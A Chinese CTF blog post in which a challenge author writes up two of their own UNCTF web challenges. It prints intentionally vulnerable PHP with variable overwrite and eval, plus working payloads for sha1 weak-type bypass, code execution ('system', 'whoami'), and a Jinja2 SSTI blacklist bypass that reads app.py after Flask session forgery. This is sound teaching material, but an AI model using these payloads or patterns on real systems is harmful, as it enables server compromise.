<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-cn">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,出题笔记," />










<meta name="description" content="前言本次是作为ctf选手生涯中第一次出题，学到了不少东西，也出了不少差错，这里简单地总结下。 easyphp这道题是结合我校每日一题和日常透站中碰到的一些东西搞出来的一道奇奇怪怪的题目，考点主要是一些php的trick。 题目源码如下： 123456789101112131415161718192021222324252627282930313233343536373839404142434445">
<meta property="og:type" content="article">
<meta property="og:title" content="unctf背锅笔记">
<meta property="og:url" content="http://www.star123.top/2020/11/19/unctf%E8%83%8C%E9%94%85%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="star&#39;s blog">
<meta property="og:description" content="前言本次是作为ctf选手生涯中第一次出题，学到了不少东西，也出了不少差错，这里简单地总结下。 easyphp这道题是结合我校每日一题和日常透站中碰到的一些东西搞出来的一道奇奇怪怪的题目，考点主要是一些php的trick。 题目源码如下： 123456789101112131415161718192021222324252627282930313233343536373839404142434445">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/10/09/tIO4Ee8iu9zU7kL.png">
<meta property="og:image" content="https://i.loli.net/2020/10/09/MH42DTvjXcIxzQo.png">
<meta property="article:published_time" content="2020-11-19T12:54:49.000Z">
<meta property="article:modified_time" content="2020-11-19T14:13:14.817Z">
<meta property="article:author" content="star">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="出题笔记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/10/09/tIO4Ee8iu9zU7kL.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.star123.top/2020/11/19/unctf背锅笔记/"/>





  <title>unctf背锅笔记 | star's blog</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">star's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.star123.top/2020/11/19/unctf%E8%83%8C%E9%94%85%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="star">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="star's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">unctf背锅笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-11-19T20:54:49+08:00">
                2020-11-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本次是作为ctf选手生涯中第一次出题，学到了不少东西，也出了不少差错，这里简单地总结下。</p>
<h2 id="easyphp"><a href="#easyphp" class="headerlink" title="easyphp"></a>easyphp</h2><p>这道题是结合我校每日一题和日常透站中碰到的一些东西搞出来的一道奇奇怪怪的题目，考点主要是一些php的trick。</p>
<p>题目源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$adminPassword = <span class="string">'d8b8caf4df69a81f2815pbcb74cd73ab'</span>;</span><br><span class="line"><span class="keyword">if</span> (!function_exists(<span class="string">'fuxkSQL'</span>)) &#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">fuxkSQL</span><span class="params">($iText)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $oText = $iText;</span><br><span class="line">        $oText = str_replace(<span class="string">'\\\\'</span>, <span class="string">'\\'</span>, $oText);</span><br><span class="line">        $oText = str_replace(<span class="string">'\"'</span>, <span class="string">'"'</span>, $oText);</span><br><span class="line">        $oText = str_replace(<span class="string">"\'"</span>, <span class="string">"'"</span>, $oText);</span><br><span class="line">        $oText = str_replace(<span class="string">"'"</span>, <span class="string">"''"</span>, $oText);</span><br><span class="line">        <span class="keyword">return</span> $oText;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (!function_exists(<span class="string">'getVars'</span>)) &#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">getVars</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $totals = array_merge($_GET, $_POST);</span><br><span class="line">        <span class="keyword">if</span> (count($_GET)) &#123;</span><br><span class="line">            <span class="keyword">foreach</span> ($_GET <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">                <span class="keyword">global</span> $&#123;$key&#125;;</span><br><span class="line">                <span class="keyword">if</span> (is_array($value)) &#123;</span><br><span class="line">                    $temp_array = <span class="keyword">array</span>();</span><br><span class="line">                    <span class="keyword">foreach</span> ($value <span class="keyword">as</span> $key2 =&gt; $value2) &#123;</span><br><span class="line">                        <span class="keyword">if</span> (function_exists(<span class="string">'mysql_real_escape_string'</span>)) &#123;</span><br><span class="line">                            $temp_array[$key2] = fuxkSQL(trim($value2));</span><br><span class="line">                        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                            $temp_array[$key2] = str_replace(<span class="string">'"'</span>, <span class="string">'\"'</span>, str_replace(<span class="string">"'"</span>, <span class="string">"\'"</span>, (trim($value2))));</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                    $&#123;$key&#125; = $_GET[$key] = $temp_array;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">if</span> (function_exists(<span class="string">'mysql_real_escape_string'</span>)) &#123;</span><br><span class="line">                        $&#123;$key&#125; = fuxkSQL(trim($value));</span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        $&#123;$key&#125; = $_GET[$key] = str_replace(<span class="string">'"'</span>, <span class="string">'\"'</span>, str_replace(<span class="string">"'"</span>, <span class="string">"\'"</span>, (trim($value))));</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">getVars();</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($source)) &#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//只有admin才能设置环境变量</span></span><br><span class="line"><span class="keyword">if</span> (md5($password) === $adminPassword &amp;&amp; sha1($verif) == $verif) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'you can set config variables!!'</span> . <span class="string">'&lt;/br&gt;'</span>;</span><br><span class="line">    <span class="keyword">foreach</span> (array_keys($GLOBALS) <span class="keyword">as</span> $key) &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/var\d&#123;1,2&#125;/'</span>, $key) &amp;&amp; strlen($GLOBALS[$key]) &lt; <span class="number">12</span>) &#123;</span><br><span class="line">            @<span class="keyword">eval</span>(<span class="string">"\$$key"</span> . <span class="string">'="'</span> . $GLOBALS[$key] . <span class="string">'";'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">foreach</span> (array_keys($GLOBALS) <span class="keyword">as</span> $key) &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/var\d&#123;1,2&#125;/'</span>, $key)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> ($GLOBALS[$key]) . <span class="string">'&lt;/br&gt;'</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="考点："><a href="#考点：" class="headerlink" title="考点："></a>考点：</h3><pre><code>      1.  变量覆盖
      2.  php弱类型 爆破sha1，md5弱类型。
      3.  php复杂变量getshell</code></pre>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><ul>
<li>首先来看下这个奇奇怪怪的getVar函数，它本质上就提供了一个全局变量覆盖的功能，可以直接将GET或者POST传入的参数转为同名的变量。例如?source=1，那么就会有个$source的变量，这个变量的值为1。但是呢，这里还加了点东西，就是对输入变量进行了一定过滤。当mysql_real_escape_string方法存在的时候，它会使用fuxkSQL函数进行过滤，这里相当于去除了反斜杠并且将单引号变成两个单引号，而在php7，mysql_real_escape_string函数不存在，只针对单引号和双引号使用反斜杠转义。这里的环境是php7，所以只对单引号和双引号做过滤。</li>
<li>看完这两个奇奇怪怪的函数后，就是正常的操作。首先要过一个md5的判断，再过一个sha1的判断，最后进入一个eval执行代码，但这里我对执行代码的长度做了点不严格地限制（不是特别想做特别严格地限制）。</li>
</ul>
<h3 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$adminPassword = <span class="string">'d8b8caf4df69a81f2815pbcb74cd73ab'</span>;</span><br><span class="line"><span class="keyword">foreach</span> ($_GET <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">  <span class="keyword">global</span> $&#123;$key&#125;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>这个功能可以覆盖$admin变量。</li>
<li>我们发现了这个adminPassword有很大的问题，这压根就不是md5。（这里实际上是变相给的个hint，然而给诸位师傅造成了困扰，呜呜呜），很明确，随便找个值和它的md5值覆盖了就好。</li>
</ul>
<h3 id="php弱类型"><a href="#php弱类型" class="headerlink" title="php弱类型"></a>php弱类型</h3><ul>
<li>php弱类型比较，考虑一种特殊情况，sha1($a)=0exxx，相当于科学计数法0，那么，爆破找出任意0exxx的变量的sha1还是0exxx。（我给出的脚本是爆破了10分钟，这个是当时强网杯做题时留好的）</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span> ($i5 = <span class="number">0</span>; $i5 &lt;= <span class="number">9999999999</span>; $i5++) &#123;</span><br><span class="line">    $res = <span class="string">'0e'</span> . $i5;</span><br><span class="line">    <span class="comment">//0e1290633704</span></span><br><span class="line">    <span class="keyword">if</span> ($res == hash(<span class="string">'sha1'</span>, $res)) &#123;</span><br><span class="line">        print_r($res);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h3 id="php复杂变量"><a href="#php复杂变量" class="headerlink" title="php复杂变量"></a>php复杂变量</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (array_keys($GLOBALS) <span class="keyword">as</span> $key) &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/var\d&#123;1,2&#125;/'</span>, $key) &amp;&amp; strlen($GLOBALS[$key]) &lt; <span class="number">12</span>) &#123;</span><br><span class="line">            @<span class="keyword">eval</span>(<span class="string">"\$$key"</span> . <span class="string">'="'</span> . $GLOBALS[$key] . <span class="string">'";'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>这段是将设置var开头，后面带1到2个数字变量的值，类似于var1=xxx;这样的</li>
<li>由于变量覆盖的环节限制了单双引号的输入，所以这里的解法为利用php复杂变量或者使用反斜杠转义被转义后的双引号（\“=&gt;\&quot;）</li>
<li>php复杂变量参考这篇文章即可。[php复杂变量][<a href="https://xz.aliyun.com/t/4785]" target="_blank" rel="noopener">https://xz.aliyun.com/t/4785]</a></li>
</ul>
<h3 id="finall-payload"><a href="#finall-payload" class="headerlink" title="finall payload"></a>finall payload</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?adminPassword&#x3D;c4ca4238a0b923820dcc509a6f75849b&amp;password&#x3D;1&amp;verif&#x3D;0e1290633704&amp;var1&#x3D;&#123;$_POST[1]&#125;&amp;var3&#x3D;$&#123;$var1()&#125;</span><br></pre></td></tr></table></figure>

<p>flag就在环境变量中，所以phpinfo就可以看到了。</p>
<p>执行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?password&#x3D;123456&amp;verif&#x3D;0e1290633704&amp;adminPassword&#x3D;e10adc3949ba59abbe56e057f20f883e&amp;var1&#x3D;$&#123;$a($b)&#125;&amp;a&#x3D;system&amp;b&#x3D;whoami</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password&#x3D;123456&amp;verif&#x3D;0e1290633704&amp;adminPassword&#x3D;e10adc3949ba59abbe56e057f20f883e&amp;var1&#x3D;&#123;$a($b)&#125;&amp;a&#x3D;phpinfo&amp;b&#x3D;-1</span><br></pre></td></tr></table></figure>

<p>能拿到flag最短6位（phpinfo），执行任意函数最少8位。</p>
<p>非预期</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?password&#x3D;123456&amp;verif&#x3D;0e1290633704&amp;adminPassword&#x3D;e10adc3949ba59abbe56e057f20f883e&amp;var1&#x3D;\&quot;;$a();?&gt;&amp;a&#x3D;phpinfo</span><br></pre></td></tr></table></figure>



<h2 id="easyflask"><a href="#easyflask" class="headerlink" title="easyflask"></a>easyflask</h2><p>这题出题人要背大锅，因为采用Gunicorn的方式启动flask，导致main中的初始化函数没被加载，导致没有添加admin账户，所以很多师傅都是直接注册admin来绕过第一个考点的，现在已经修复了。</p>
<h3 id="考点"><a href="#考点" class="headerlink" title="考点"></a>考点</h3><ol>
<li>flask session伪造</li>
<li>flask ssti</li>
</ol>
<h3 id="flask-session伪造"><a href="#flask-session伪造" class="headerlink" title="flask session伪造"></a>flask session伪造</h3><ul>
<li><p>首先题目明确告诉你你需要登录为admin，那么先试试login路由，这个路由很好猜的login</p>
</li>
<li><p>登录失败，让你去register，你就register一个不是admin然后登录。</p>
</li>
<li><p>登录成功在首页的源码里面找到了一些hint，爆破secret key，这里推荐工具，flask-unsign</p>
<p><img src="https://i.loli.net/2020/10/09/tIO4Ee8iu9zU7kL.png" alt="登录成功"> </p>
</li>
<li><p>爆破secret后伪造session 将username改成admin即可</p>
</li>
</ul>
<h3 id="ssti"><a href="#ssti" class="headerlink" title="ssti"></a>ssti</h3><ul>
<li><p>在secret_route_you_do_not_know路由出发现ssti</p>
<p><img src="https://i.loli.net/2020/10/09/MH42DTvjXcIxzQo.png" alt="发现ssti"></p>
</li>
<li><p>fuzz 发现过滤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;%&#39;, &#39;_&#39;, &#39;eval&#39;, &#39;open&#39;, &#39;flag&#39;,in, &#39;-&#39;, &#39;class&#39;, &#39;mro&#39;, &#39;[&#39;, &#39;]&#39;, &#39;\&quot;&#39;, &#39;\&#39;&#39;</span><br></pre></td></tr></table></figure>



</li>
</ul>
<ul>
<li><pre><code>{{((session|attr(request.headers.x))|attr(request.headers.x1)).get(request.headers.x2).get(request.headers.x3)(request.headers.x4).read()}}
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">  </span><br><span class="line">具体就是attr和request.header.xn代替黑名单，拿出eval或者open函数执行即可,flag在app.py同目录下。</span><br></pre></td></tr></table></figure>
x: __init__
x1: __globals__
x2: __builtins__
x3: open
x4: app.py</code></pre>
</li>
</ul>
<h2 id="谈谈自己在un中做的题"><a href="#谈谈自己在un中做的题" class="headerlink" title="谈谈自己在un中做的题"></a>谈谈自己在un中做的题</h2><ol>
<li>Lovephp这题，硬做没做出来，最后发现能够include$_GET[1];这样来满足限制，php的language parse总是这么神奇。</li>
<li>ezphp这题虽然比较简单，但是在flag里面搞事情的套路我记住了，下回拿来坑人。</li>
</ol>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>​        有些时候，总是想着如果当时能如何如何就好了，但是是没有用的。虽然说经过这次出题，的确学习了很多东西，但是尤其是像easyflask这样的错误完全是可以避免的，做事可不能继续马虎了。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/%E5%87%BA%E9%A2%98%E7%AC%94%E8%AE%B0/" rel="tag"># 出题笔记</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/11/06/xnuctf-easyjava%E5%A4%8D%E7%8E%B0/" rel="next" title="xnuctf_easyjava复现">
                <i class="fa fa-chevron-left"></i> xnuctf_easyjava复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/11/25/%E5%AE%89%E6%B4%B5%E6%9D%AFwebwp/" rel="prev" title="安洵杯webwp">
                安洵杯webwp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">star</p>
              <p class="site-description motion-element" itemprop="description">ctf wp and technologies about security</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">37</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">31</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easyphp"><span class="nav-number">2.</span> <span class="nav-text">easyphp</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#考点："><span class="nav-number">2.1.</span> <span class="nav-text">考点：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分析"><span class="nav-number">2.2.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#变量覆盖"><span class="nav-number">2.3.</span> <span class="nav-text">变量覆盖</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php弱类型"><span class="nav-number">2.4.</span> <span class="nav-text">php弱类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php复杂变量"><span class="nav-number">2.5.</span> <span class="nav-text">php复杂变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#finall-payload"><span class="nav-number">2.6.</span> <span class="nav-text">finall payload</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easyflask"><span class="nav-number">3.</span> <span class="nav-text">easyflask</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#考点"><span class="nav-number">3.1.</span> <span class="nav-text">考点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#flask-session伪造"><span class="nav-number">3.2.</span> <span class="nav-text">flask session伪造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssti"><span class="nav-number">3.3.</span> <span class="nav-text">ssti</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#谈谈自己在un中做的题"><span class="nav-number">4.</span> <span class="nav-text">谈谈自己在un中做的题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">star</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
